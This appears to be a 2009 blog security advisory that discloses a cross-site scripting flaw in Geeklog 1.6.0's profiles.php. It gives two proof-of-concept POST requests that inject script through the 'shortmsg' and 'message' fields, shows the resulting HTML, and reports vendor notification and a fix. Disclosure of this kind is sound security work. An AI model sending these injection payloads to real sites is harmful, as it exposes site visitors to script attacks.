Tuesday, July 28, 2009

Geeklog v.1.6.0 Cross-Site Scripting

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Geeklog (1.6.0)
Product Homepage: http://www.geeklog.net/
Versions Affected: v.1.6.0 (Other versions may also be affected)
Severity: Medium

Input passed to the 'shortmsg' and 'message' POST parameter when posting to '/profiles.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example 1:
POST /profiles.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

what=sendstory&from=x&fromemail=x&to=x&toemail=x&shortmsg=1</textarea><script>alert(1234)</script><textarea>&sid=welcome
will result in:
<td><textarea name="shortmsg" rows="8" style="width:100%">1</textarea><script>alert(1234)</script><textarea></textarea></td>


Example 2:
POST /profiles.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

what=contact&author=x&authoremail=x&subject=x&message=1</textarea><script>alert(123)</script>&uid=2
will result in:
<td><textarea name="message" wrap="physical" rows="10" cols="50">1</textarea><script>alert(123)</script></textarea></td>


Status:
1. Contacted the author at: July 28, 2009 via security email.
2. The author promptly fixed the problem, see at http://www.geeklog.net/article.php/geeklog-1.6.0sr1.

No comments:

Post a Comment